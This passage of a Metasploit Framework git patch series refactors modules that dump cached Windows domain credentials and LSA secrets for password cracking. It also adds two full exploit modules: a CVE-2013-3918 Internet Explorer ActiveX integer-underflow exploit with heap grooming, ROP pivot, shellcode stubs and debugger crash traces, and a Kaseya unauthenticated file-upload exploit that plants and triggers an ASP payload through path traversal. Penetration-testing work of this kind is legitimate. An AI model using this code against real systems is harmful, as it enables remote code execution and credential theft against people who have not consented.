+      homeDirectoryDrive = dec_data[i,s.homeDirectoryDriveLength+1].split("\x00\x00").first.gsub("\x00", '')
       i+=s.homeDirectoryDriveLength
       i+=2 * ( ( s.homeDirectoryDriveLength / 2 ) % 2 )
       vprint_good "Home Directory Drive\t: #{homeDirectoryDrive}"
@@ -150,9 +140,9 @@ class Metasploit3 < Msf::Post
     relativeId = []
     while (s.groupCount > 0) do
       # Todo: parse attributes
-      relativeId << dec_data[i...i+4].unpack("V")[0]
+      relativeId << dec_data[i,4].unpack("V")[0]
       i+=4
-      attributes = dec_data[i...i+4].unpack("V")[0]
+      attributes = dec_data[i,4].unpack("V")[0]
       i+=4
       s.groupCount-=1
     end
@@ -160,7 +150,7 @@ class Metasploit3 < Msf::Post
     vprint_good "Additional groups\t: #{relativeId.join ' '}"
 
     if( s.logonDomainNameLength != 0 )
-      logonDomainName = dec_data[i...i+s.logonDomainNameLength+1].split("\x00\x00").first.gsub("\x00", '')
+      logonDomainName = dec_data[i,s.logonDomainNameLength+1].split("\x00\x00").first.gsub("\x00", '')
       i+=s.logonDomainNameLength
       i+=2 * ( ( s.logonDomainNameLength / 2 ) % 2 )
       vprint_good "Logon domain name\t: #{logonDomainName}"
@@ -185,7 +175,12 @@ class Metasploit3 < Msf::Post
         ]
 
     vprint_good "----------------------------------------------------------------------"
-    return "#{username.downcase}:#{hash.unpack("H*")[0]}:#{dnsDomainName}:#{logonDomainName}\n"
+    if lsa_vista_style?
+      return "#{username.downcase}:$DCC2$##{username.downcase}##{hash.unpack("H*")[0]}:#{dnsDomainName}:#{logonDomainName}\n"
+    else
+      return "#{username.downcase}:#{hash.unpack("H*")[0]}:#{dnsDomainName}:#{logonDomainName}\n"
+    end
+
   end
 
   def parse_cache_entry(cache_data)
@@ -258,10 +253,10 @@ class Metasploit3 < Msf::Post
     rc4key = OpenSSL::HMAC.digest(OpenSSL::Digest::Digest.new('md5'), nlkm, ch)
     rc4 = OpenSSL::Cipher::Cipher.new("rc4")
     rc4.key = rc4key
-    dec  = rc4.update(edata)
-    dec << rc4.final
+    decrypted  = rc4.update(edata)
+    decrypted << rc4.final
 
-    return dec
+    return decrypted
   end
 
   def decrypt_hash_vista(edata, nlkm, ch)
@@ -271,13 +266,12 @@ class Metasploit3 < Msf::Post
     aes.decrypt
     aes.iv = ch
 
-    jj = ""
-    for i in (0...edata.length).step(16)
-      xx = aes.update(edata[i...i+16])
-      jj += xx
+    decrypted = ""
+    (0...edata.length).step(16) do |i|
+      decrypted << aes.update(edata[i,16])
     end
 
-    return jj
+    return decrypted
   end
 
 
@@ -304,14 +298,14 @@ class Metasploit3 < Msf::Post
     ])
 
     begin
-      print_status("Executing module against #{session.sys.config.sysinfo['Computer']}")
+      print_status("Executing module against #{sysinfo['Computer']}")
       client.railgun.netapi32()
       if client.railgun.netapi32.NetGetJoinInformation(nil,4,4)["BufferType"] != 3
         print_error("System is not joined to a domain, exiting..")
         return
       end
 
-      #Check policy setting for cached creds
+      # Check policy setting for cached creds
       check_gpo
 
       print_status('Obtaining boot key...')
@@ -320,6 +314,11 @@ class Metasploit3 < Msf::Post
 
       print_status('Obtaining Lsa key...')
       lsakey = capture_lsa_key(bootkey)
+      if lsakey.nil?
+        print_error("Could not retrieve LSA key. Are you SYSTEM?")
+        return
+      end
+
       print_status("Lsa Key: #{lsakey.unpack("H*")[0]}") if( datastore['DEBUG'] )
 
       print_status("Obtaining LK$KM...")
@@ -349,7 +348,7 @@ class Metasploit3 < Msf::Post
           print_status("Encrypted data: #{cache.enc_data.unpack("H*")[0]}") if( datastore['DEBUG'] )
           print_status("Ch:  #{cache.ch.unpack("H*")[0]}") if( datastore['DEBUG'] )
 
-          if( @vista == 1 )
+          if lsa_vista_style?
             dec_data = decrypt_hash_vista(cache.enc_data, nlkm, cache.ch)
           else
             dec_data = decrypt_hash(cache.enc_data, nlkm, cache.ch)
@@ -357,28 +356,27 @@ class Metasploit3 < Msf::Post
 
           print_status("Decrypted data: #{dec_data.unpack("H*")[0]}") if( datastore['DEBUG'] )
 
-          john += parse_decrypted_cache(dec_data, cache)
+          john << parse_decrypted_cache(dec_data, cache)
 
         end
       end
 
-      print_status("John the Ripper format:")
-
-      john.split("\n").each do |pass|
-        print "#{pass}\n"
-      end
-
-      if( @vista == 1 )
+      if lsa_vista_style?
         print_status("Hash are in MSCACHE_VISTA format. (mscash2)")
         p = store_loot("mscache2.creds", "text/csv", session, @credentials.to_csv, "mscache2_credentials.txt", "MSCACHE v2 Credentials")
         print_status("MSCACHE v2 saved in: #{p}")
 
+        john = "# mscash2\n" + john
       else
         print_status("Hash are in MSCACHE format. (mscash)")
         p = store_loot("mscache.creds", "text/csv", session, @credentials.to_csv, "mscache_credentials.txt", "MSCACHE v1 Credentials")
         print_status("MSCACHE v1 saved in: #{p}")
+        john = "# mscash\n" + john
       end
 
+      print_status("John the Ripper format:")
+      print_line john
+
     rescue ::Interrupt
       raise $!
     rescue ::Rex::Post::Meterpreter::RequestError => e
diff --git a/modules/post/windows/gather/lsa_secrets.rb b/modules/post/windows/gather/lsa_secrets.rb
index b512b63abb..6bfcb67962 100644
--- a/modules/post/windows/gather/lsa_secrets.rb
+++ b/modules/post/windows/gather/lsa_secrets.rb
@@ -54,7 +54,7 @@ class Metasploit3 < Msf::Post
         val_key = root_regkey + "\\" + secret_regkey + "\\" + mkeys
         encrypted_secret = registry_getvaldata(val_key, "")
 
-        if @vista == 1
+        if lsa_vista_style?
           # Magic happens here
           decrypted = decrypt_lsa_data(encrypted_secret, lsa_key)
         else

From cb10b4783b0dc3f954759329534cc7783b30c68d Mon Sep 17 00:00:00 2001
From: James Lee <egypt@metasploit.com>
Date: Wed, 13 Nov 2013 19:04:16 -0600
Subject: [PATCH 026/217] Mark XP hashes as mscash for JtR to recognize

---
 modules/post/windows/gather/cachedump.rb | 4 +---
 1 file changed, 1 insertion(+), 3 deletions(-)

diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb
index bd3b928797..b99895a3ef 100644
--- a/modules/post/windows/gather/cachedump.rb
+++ b/modules/post/windows/gather/cachedump.rb
@@ -1,5 +1,3 @@
-# post/windows/gather/cachedump.rb
-
 ##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -176,7 +174,7 @@ class Metasploit3 < Msf::Post
     if lsa_vista_style?
       return "#{username.downcase}:$DCC2$##{username.downcase}##{hash.unpack("H*")[0]}:#{dnsDomainName}:#{logonDomainName}\n"
     else
-      return "#{username.downcase}:#{hash.unpack("H*")[0]}:#{dnsDomainName}:#{logonDomainName}\n"
+      return "#{username.downcase}:M$#{username.downcase}##{hash.unpack("H*")[0]}:#{dnsDomainName}:#{logonDomainName}\n"
     end
 
   end

From 5b96ad595ff3f8e0335d2dd44476a581c8e88f1b Mon Sep 17 00:00:00 2001
From: James Lee <egypt@metasploit.com>
Date: Wed, 13 Nov 2013 19:05:16 -0600
Subject: [PATCH 027/217] Skip reg values with no secretes

Also update header comment to match new standard
---
 modules/post/windows/gather/lsa_secrets.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/post/windows/gather/lsa_secrets.rb b/modules/post/windows/gather/lsa_secrets.rb
index 6bfcb67962..af1252d1e3 100644
--- a/modules/post/windows/gather/lsa_secrets.rb
+++ b/modules/post/windows/gather/lsa_secrets.rb
@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
@@ -54,6 +52,8 @@ class Metasploit3 < Msf::Post
         val_key = root_regkey + "\\" + secret_regkey + "\\" + mkeys
         encrypted_secret = registry_getvaldata(val_key, "")
 
+        next unless encrypted_secret
+
         if lsa_vista_style?
           # Magic happens here
           decrypted = decrypt_lsa_data(encrypted_secret, lsa_key)

From cbb7eb192cbcffccf0005b8f10df1f018df9e778 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 15 Nov 2013 10:38:52 -0600
Subject: [PATCH 028/217] Add module for CVE-2013-3918

---
 .../browser/ms13_090_cardspacesigninhelper.rb | 380 ++++++++++++++++++
 1 file changed, 380 insertions(+)
 create mode 100644 modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb

diff --git a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
new file mode 100644
index 0000000000..e800c4120d
--- /dev/null
+++ b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
@@ -0,0 +1,380 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "MS13-090 CardSpaceClaimCollection ActiveX Integer Underflow",
+      'Description'    => %q{
+        This module exploits a vulnerability on the CardSpaceClaimCollection class from the
+        icardie.dll ActiveX control. The vulnerability exists while the handling of the
+        CardSpaceClaimCollection object. CardSpaceClaimCollections stores a collection of
+        elements on a SafeArray and keeps a size field, counting the number of elements on the
+        collection. By calling the remove() method on an empty CardSpaceClaimCollection it is
+        possible to underflow the length field, storing a negative integer. Later, a call to
+        the add() method will use the corrupted length field to compute the address where write
+        into the SafeArray data, allowing to corrupt memory with a pointer to controlled contents.
+        This module achieves code execution by using VBScript as discovered in the wild on
+        November 2013 to (1) create an array of html OBJECT elements, (2) create holes, (3) create
+        a CardSpaceClaimCollection whose SafeArray data will reuse one of the holes, (4) corrupt
+        one of the legit OBJECT elements with the described integer overflow and (5) achieve code
+        execution by forcing the use of the corrupted OBJECT.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Unknown',     # Vulnerability Discovery and exploit in the wild
+          'juan vazquez' # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE',   '2013-3918'],
+          [ 'OSVDB', '99555' ],
+          [ 'BID',   '63631' ],
+          [ 'MSB',   'MS13-090' ],
+          [ 'URL',   'http://blogs.technet.com/b/msrc/archive/2013/11/11/activex-control-issue-being-addressed-in-update-tuesday.aspx' ]
+        ],
+      'Payload'        =>
+        {
+          'Space'          => 4096,
+          'DisableNops'    => true,
+          'BadChars'       => "\x00",
+          # Patch the stack to execute the decoder...
+          'PrependEncoder' => "\x81\xc4\x0c\xfe\xff\xff", # add esp, -500
+          # Fix the stack again, this time better :), before the payload
+          # is executed.
+          'Prepend'        => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
+                              "\x83\xC0\x08"             + # add eax, byte 8
+                              "\x8b\x20"                 + # mov esp, [eax]
+                              "\x81\xC4\x30\xF8\xFF\xFF",  # add esp, -2000
+        },
+      'DefaultOptions'  =>
+        {
+          'InitialAutoRunScript' => 'migrate -f'
+        },
+      'Platform'       => 'win',
+      'BrowserRequirements' =>
+        {
+          :source  => /script|headers/i,
+          :clsid   => "{19916E01-B44E-4E31-94A4-4696DF46157B}",
+          :method  => "requiredClaims",
+          :os_name => Msf::OperatingSystems::WINDOWS
+        },
+      'Targets'        =>
+        [
+          [ 'Windows XP with IE 8',
+            {
+              'os_flavor' => Msf::OperatingSystems::WindowsVersions::XP,
+              'ua_name'   => Msf::HttpClients::IE,
+              'ua_ver'    => '8.0',
+              'arch'      => ARCH_X86
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Nov 08 2013",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
+      ], self.class
+    )
+  end
+
+  def exploit_template(cli, target_info)
+    stack_pivot = [
+      0x77c20433, # pop ebp, ret  # eax points here
+      0x77c15ed5  # xchg eax, esp # eip
+    ].pack("V*")
+
+    symbols = {
+      "CardSpaceSigninHelper" => rand_text_alpha(5 + rand(5)),
+      "get_code"              => rand_text_alpha(5 + rand(5)),
+      "code"                  => rand_text_alpha(5 + rand(5)),
+      "massage_array"         => rand_text_alpha(5 + rand(5)),
+      "required_claims"       => rand_text_alpha(5 + rand(5)),
+      "massage_array"         => rand_text_alpha(5 + rand(5)),
+      "massage_array_length"  => rand_text_alpha(5 + rand(5)),
+      "zero"                  => rand_text_alpha(5 + rand(5)),
+      "underflow"             => rand_text_alpha(5 + rand(5)),
+      "my_code"               => rand_text_alpha(5 + rand(5))
+    }
+
+    rop_payload = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp', 'pivot' => stack_pivot})
+    js_payload = Rex::Text.to_unescape(rop_payload)
+
+    html_template = %Q|
+    <html><body>
+    <object classid='clsid:19916E01-B44E-4E31-94A4-4696DF46157B' id='<%=symbols["CardSpaceSigninHelper"]%>'></object>
+    <script language='JavaScript'>
+
+    function <%=symbols["get_code"]%>(){
+      var <%=symbols["code"]%> = unescape("<%=js_payload%>");
+      return <%=symbols["code"]%>;
+    }
+    </script>
+    <script language='vbscript'>
+    On Error Resume Next
+    Dim <%=symbols["massage_array"]%>(5493)
+    <%=symbols["massage_array_length"]%> = 5493
+    <%=symbols["underflow"]%> = -7
+    <%=symbols["zero"]%> = 0
+
+    Set <%=symbols["required_claims"]%> = <%=symbols["CardSpaceSigninHelper"]%>.requiredClaims
+
+    For i = <%=symbols["zero"]%> to <%=symbols["massage_array_length"]%>
+      Set <%=symbols["massage_array"]%>(i) = document.createElement("object")
+    Next
+
+    For i = 4093 to <%=symbols["massage_array_length"]%> Step 2
+      <%=symbols["massage_array"]%>(i) = Null
+    Next
+
+    For i = <%=symbols["zero"]%> to <%=symbols["underflow"]%> Step -1
+      <%=symbols["required_claims"]%>.remove(CLng(i))
+    Next
+
+    Dim <%=symbols["my_code"]%>
+    <%=symbols["my_code"]%> = <%=symbols["get_code"]%>()
+    <%=symbols["required_claims"]%>.add(<%=symbols["my_code"]%>)
+
+    For i = <%=symbols["zero"]%> = 0 to <%=symbols["massage_array_length"]%>
+      if <%=symbols["massage_array"]%>(i) <> Null Then
+        <%=symbols["massage_array"]%>(i).focus
+      End If
+    Next
+
+    For i = <%=symbols["zero"]%> = 0 to <%=symbols["massage_array_length"]%>
+      <%=symbols["massage_array"]%>(i) = Null
+    Next
+
+    </script></body></html>
+    |
+
+    return html_template, binding()
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Sending HTML...")
+    send_exploit_html(cli, exploit_template(cli, target_info))
+  end
+
+end
+
+=begin
+The CCardSpaceClaimCollection is abused. It is a 0x10 size object whose memory is allocated at:
+
+.text:0040A6E8                 and     dword ptr [edi], 0
+.text:0040A6EB                 push    ebx
+.text:0040A6EC                 push    esi
+.text:0040A6ED                 push    10h             ; unsigned int
+.text:0040A6EF                 mov     ebx, 8007000Eh
+.text:0040A6F4                 call    ??2@YAPAXI@Z    ; operator new(uint)
+
+The interesting fields:
+
+0x0 : vftable
+0x4 : unknown
+0x8 : number of elements on the collection (size)
+0xc : pointer to the CCardSpaceClaimCollection elements stored on a SafeArray
+(http://msdn.microsoft.com/en-us/library/windows/desktop/ms221482(v=vs.85).aspx)
+
+Both three fields are initialized to 0 / NULL when creating an instance of the object:
+
+.text:00409980 ; public: __thiscall CCardSpaceClaimCollection::CCardSpaceClaimCollection(void)
+.text:00409980                 xor     ecx, ecx
+.text:00409982                 mov     [eax+4], ecx
+.text:00409985                 mov     [eax+8], ecx
+.text:00409988                 mov     [eax+0Ch], ecx
+.text:0040998B                 retn
+
+(1) The first problem happens on CCardSpaceClaimCollection::remove, since it's possible to remove an element
+from a 0 length collection, underflowing the length field:
+
+.text:00409D46 loc_409D46:                             ; CODE XREF: CCardSpaceClaimCollection::remove(tagVARIANT *)+85j
+.text:00409D46                 dec     dword ptr [esi+8] ;  esi pointing to the CCardSpaceClaimCollection
+
+Debugging the underflow:
+
+0:017> bu icardie!CCardSpaceClaimCollection::remove+0xa0
+0:017> g
+ModLoad: 033b0000 033c2000   C:\WINDOWS\system32\icardie.dll
+ModLoad: 63380000 63434000   C:\WINDOWS\system32\jscript.dll
+ModLoad: 034e0000 0354a000   C:\WINDOWS\system32\vbscript.dll
+Breakpoint 0 hit
+eax=03672280 ebx=0022012c ecx=00000000 edx=00000000 esi=0035da40 edi=00000000
+eip=033b9d46 esp=0201f3e4 ebp=0201f3f8 iopl=0         nv up ei pl nz ac pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
+icardie!CCardSpaceClaimCollection::remove+0xa0:
+033b9d46 ff4e08          dec     dword ptr [esi+8]    ds:0023:0035da48=00000000
+0:008> g
+Breakpoint 0 hit
+eax=0367227c ebx=0022012c ecx=00000000 edx=00000000 esi=0035da40 edi=ffffffff
+eip=033b9d46 esp=0201f3e4 ebp=0201f3f8 iopl=0         nv up ei pl nz ac pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
+icardie!CCardSpaceClaimCollection::remove+0xa0:
+033b9d46 ff4e08          dec     dword ptr [esi+8]    ds:0023:0035da48=ffffffff
+0:008> g
+Breakpoint 0 hit
+eax=03672278 ebx=0022012c ecx=00000000 edx=00000000 esi=0035da40 edi=fffffffe
+eip=033b9d46 esp=0201f3e4 ebp=0201f3f8 iopl=0         nv up ei pl nz ac pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
+icardie!CCardSpaceClaimCollection::remove+0xa0:
+033b9d46 ff4e08          dec     dword ptr [esi+8]    ds:0023:0035da48=feffffff
+0:008> g
+Breakpoint 0 hit
+eax=03672274 ebx=0022012c ecx=00000000 edx=00000000 esi=0035da40 edi=fffffffd
+eip=033b9d46 esp=0201f3e4 ebp=0201f3f8 iopl=0         nv up ei pl nz ac pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
+icardie!CCardSpaceClaimCollection::remove+0xa0:
+033b9d46 ff4e08          dec     dword ptr [esi+8]    ds:0023:0035da48=fdffffff
+0:008> g
+Breakpoint 0 hit
+eax=03672270 ebx=0022012c ecx=00000000 edx=00000000 esi=0035da40 edi=fffffffc
+eip=033b9d46 esp=0201f3e4 ebp=0201f3f8 iopl=0         nv up ei pl nz ac pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
+icardie!CCardSpaceClaimCollection::remove+0xa0:
+033b9d46 ff4e08          dec     dword ptr [esi+8]    ds:0023:0035da48=fcffffff
+0:008> g
+Breakpoint 0 hit
+eax=0367226c ebx=0022012c ecx=00000000 edx=00000000 esi=0035da40 edi=fffffffb
+eip=033b9d46 esp=0201f3e4 ebp=0201f3f8 iopl=0         nv up ei pl nz ac pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
+icardie!CCardSpaceClaimCollection::remove+0xa0:
+033b9d46 ff4e08          dec     dword ptr [esi+8]    ds:0023:0035da48=fbffffff
+0:008> g
+Breakpoint 0 hit
+eax=03672268 ebx=0022012c ecx=00000000 edx=00000000 esi=0035da40 edi=fffffffa
+eip=033b9d46 esp=0201f3e4 ebp=0201f3f8 iopl=0         nv up ei pl nz ac pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
+icardie!CCardSpaceClaimCollection::remove+0xa0:
+033b9d46 ff4e08          dec     dword ptr [esi+8]    ds:0023:0035da48=faffffff
+0:008> g
+Breakpoint 0 hit
+eax=03672264 ebx=0022012c ecx=00000000 edx=00000000 esi=0035da40 edi=fffffff9
+eip=033b9d46 esp=0201f3e4 ebp=0201f3f8 iopl=0         nv up ei pl nz ac pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
+icardie!CCardSpaceClaimCollection::remove+0xa0:
+033b9d46 ff4e08          dec     dword ptr [esi+8]    ds:0023:0035da48=f9ffffff
+0:008> g
+
+(2) The second problem happens on CCardSpaceClaimCollection::add
+
+First of all the SafeArray Container is get:
+
+.text:00409C0A                 mov     esi, [ebp+arg_0]
+.text:00409C0D                 call    ?GetInnerArray@CCardSpaceClaimCollection@@AAEPAUtagSAFEARRAY@@XZ ; C
+
+ and its capacity checked, so if needed it's going to be resized
+
+.text:00409C20 loc_409C20:                             ; CODE XREF: CCardSpaceClaimCollection::add(tagVARIANT *)+48j
+.text:00409C20                 mov     ebx, [esi+8]    ; The number of elements
+.text:00409C23                 inc     ebx             ; The number of elements incremented
+.text:00409C24                 call    ?GrowInnerArrayIfRequired@CCardSpaceClaimCollection@@AAEJJ@Z ;
+
+In order to check if the SafeArray needs to be resized GrowInnerArrayIfRequired checks
+the length of the CCardSpaceClaimCollection(underflowed) against the capacity of the SafeArray,
+since the comparision is signed, nothing is resized:
+
+0:008> g
+Breakpoint 4 hit
+eax=00000000 ebx=fffffff9 ecx=00000009 edx=0000000a esi=0035e6b8 edi=00242b44
+eip=036a9e41 esp=0201f3d0 ebp=0201f3dc iopl=0         nv up ei pl zr na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
+icardie!CCardSpaceClaimCollection::GrowInnerArrayIfRequired+0x2e:
+036a9e41 3bda            cmp     ebx,edx
+0:008> r ebx, edx
+ebx=fffffff9 edx=0000000a
+
+Since the comparision is signed, nothing is resized:
+
+0:008> t
+eax=00000000 ebx=fffffff9 ecx=00000009 edx=0000000a esi=0035e6b8 edi=00242b44
+eip=036a9e43 esp=0201f3d0 ebp=0201f3dc iopl=0         nv up ei ng nz ac po nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000292
+icardie!CCardSpaceClaimCollection::GrowInnerArrayIfRequired+0x30:
+036a9e43 7e1f            jle     icardie!CCardSpaceClaimCollection::GrowInnerArrayIfRequired+0x51 (036a9e64) [br=1]
+
+In order to proceed to modify the SafeArray, "add" saves a pointer to the data (ppvData) into a local variable:
+
+.text:00409C2F                 lea     eax, [ebp+ppvData]
+.text:00409C32                 push    eax             ; ppvData
+.text:00409C33                 push    [ebp+psa]       ; psa
+.text:00409C36                 call    ds:__imp__SafeArrayAccessData@8 ; SafeArrayAccessData(x,x)
+
+Then an String witht the user controlled contents is created, and a pointer to the contents is stored
+into the ppvData. Unfortunately, the underflowed length address is used to calculate where to store the
+thing:
+
+.text:00409C51                 push    dword ptr [edi+8] ; psz
+.text:00409C54                 call    ds:__imp__SysAllocString@4 ; SysAllocString(x)
+.text:00409C5A                 mov     ecx, [esi+8]
+.text:00409C5D                 mov     edx, [ebp+ppvData]
+.text:00409C60                 mov     [edx+ecx*4], eax ; edx pointer to ppvdata, ecx is the corrupted CCardSpaceClaimCollection length
+
+Finally the CCardSpaceClaimCollection size is incremented:
+.text:00409C63                 inc     dword ptr [esi+8]
+
+When debugging :
+
+0:008> t
+eax=001f5884 ebx=00000000 ecx=fffffff8 edx=00000028 esi=0035e6b8 edi=00242b44
+eip=036a9c5d esp=0201f3e4 ebp=0201f3f8 iopl=0         nv up ei pl zr na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
+icardie!CCardSpaceClaimCollection::add+0x8e:
+036a9c5d 8b55f8          mov     edx,dword ptr [ebp-8] ss:0023:0201f3f0=10798a03
+0:008> t
+
+Here the underflow happens edx+ecx*4 points to 038a78f0, which is below 038a7910,
+where ppvData lives:
+
+eax=001f5884 ebx=00000000 ecx=fffffff8 edx=038a7910 esi=0035e6b8 edi=00242b44
+eip=036a9c60 esp=0201f3e4 ebp=0201f3f8 iopl=0         nv up ei pl zr na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
+icardie!CCardSpaceClaimCollection::add+0x91:
+036a9c60 89048a          mov     dword ptr [edx+ecx*4],eax ds:0023:038a78f0=00000000
+0:008> t
+eax=001f5884 ebx=00000000 ecx=fffffff8 edx=038a7910 esi=0035e6b8 edi=00242b44
+eip=036a9c63 esp=0201f3e4 ebp=0201f3f8 iopl=0         nv up ei pl zr na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
+icardie!CCardSpaceClaimCollection::add+0x94:
+036a9c63 ff4608          inc     dword ptr [esi+8]    ds:0023:0035e6c0=f8ffffff
+
+Later the overwritten object is used, its memory dereferenced and control of the execution flow is possible:
+
+0:008> g
+(b4c.b70): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=001f5884 ebx=00000000 ecx=038a78e0 edx=0201f5e4 esi=00000002 edi=036d150c
+eip=cccccccc esp=0201f5b4 ebp=0201f5c0 iopl=0         nv up ei pl zr na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
+cccccccc ??              ???
+0:008> dd ecx
+038a78e0  63ab1b18 00000002 6363fbe4 03894d38
+038a78f0  001f5884 00000000 00000000 00000000
+038a7900  00000000 00000000 00000000 00000000
+038a7910  00000000 00000000 00000000 00000000
+038a7920  00000000 00000000 00000000 00000000
+038a7930  00000000 00000000 e8319dff ff080100
+038a7940  63ab1b18 00000001 6363fbe4 03894f08
+038a7950  63767260 00000000 00000000 00020000
+0:008> db 001f5884
+001f5884  bb bb bb bb cc cc cc cc-cc cc cc cc cc cc cc cc  ................
+001f5894  cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc  ................
+001f58a4  cc cc cc cc cc cc cc cc-00 00 00 00 e6 7e a1 ea  .............~..
+001f58b4  00 01 08 ff 70 18 5c 75-2c 18 5c 75 02 00 00 00  ....p.\u,.\u....
+001f58c4  e8 ac 9c 02 00 00 00 80-f3 1b 5d 75 b8 58 1f 00  ..........]u.X..
+001f58d4  48 00 9c 02 84 14 5c 75-e8 ac 9c 02 1b 00 00 00  H.....\u........
+001f58e4  e8 52 19 00 ed 7e a1 ea-00 01 08 ff 08 00 00 00  .R...~..........
+001f58f4  90 01 00 00 f0 00 00 00-00 00 00 00 01 00 00 00  ................
+=end
\ No newline at end of file

From 636fdfe2d2bb0568e2fe0910ab9326ff0e5efb2a Mon Sep 17 00:00:00 2001
From: Thomas Hibbert <thomas.hibbert@security-assessment.com>
Date: Mon, 18 Nov 2013 14:23:34 +1300
Subject: [PATCH 029/217] Added Kaseya uploadImage exploit.

---
 .../http/kaseya_uploadimage_file_upload.rb    | 93 +++++++++++++++++++
 1 file changed, 93 insertions(+)
 create mode 100644 modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb

diff --git a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
new file mode 100644
index 0000000000..825c24827e
--- /dev/null
+++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
@@ -0,0 +1,93 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::EXE
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Kaseya uploadImage Arbitrary File Upload',
+			'Description'    => %q{
+					This module exploits an arbitrary file upload vulnerability found in Kaseya 6.3.0.0
+				A malicious user can upload a file to an arbitrary directory without authentication, which can result in arbitrary code execution.
+Code executed in this manner runs under the IUSR account.
+			},
+			'Author'         =>
+				[
+					'Thomas Hibbert' # thomas.hibbert@security-assessment.com
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+				],
+			'Payload'	     =>
+				{
+					'BadChars' => "\x00",
+				},
+			'Platform'       => 'win',
+			'Arch'		     => ARCH_x86,
+			'Targets'        =>
+				[
+                                 [ 'Kaseya KServer / Windows', {} ],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'some point....'))
+
+		register_options(
+			[                     
+                         Opt::RPORT(80), Opt::RHOST()
+			], self.class)
+	end
+
+	def check
+		res = send_request_cgi({
+			'method' => 'POST',
+			'uri'    => normalize_uri('SystemTab','uploadImage.asp')
+		})
+
+		if not res or res.code != 200
+			return Exploit::CheckCode::Unknown
+		end
+
+		return Exploit::CheckCode::Appears
+	end
+
+	def exploit
+          peer = "#{rhost}:#{rport}"
+          
+          @payload_name = "#{rand_text_alpha_lower(8)}.asp"
+          exe  = generate_payload_exe
+          asp  = Msf::Util::EXE.to_exe_asp(exe)          
+
+		data = Rex::MIME::Message.new
+          data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"#{payload_name}\"")
+
+		res = send_request_raw({
+			'method' => 'POST',
+                                         'uri'    => normalize_uri('SystemTab','uploadImage.asp?filename=..\..\..\#{payload_name}'),
+                                         'data'   => data,
+			'headers'	=> {
+                                           'ctype' => 'multipart/form-data; boundary=#{data.bound}'
+			}
+		})
+		if not res or res.code != 200
+			fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
+		end
+
+		print_status("#{peer} - Executing payload #{@payload_name}")
+		res = send_request_raw({
+			'uri'    => normalize_uri(@payload_name),
+			'method' => 'GET'
+		})
+	end
+end

From 60a245b0c37d529bc3f1cf7b96d21fff08ddbb1d Mon Sep 17 00:00:00 2001
From: Thomas Hibbert <thomas.hibbert@security-assessment.com>
Date: Mon, 18 Nov 2013 14:49:03 +1300
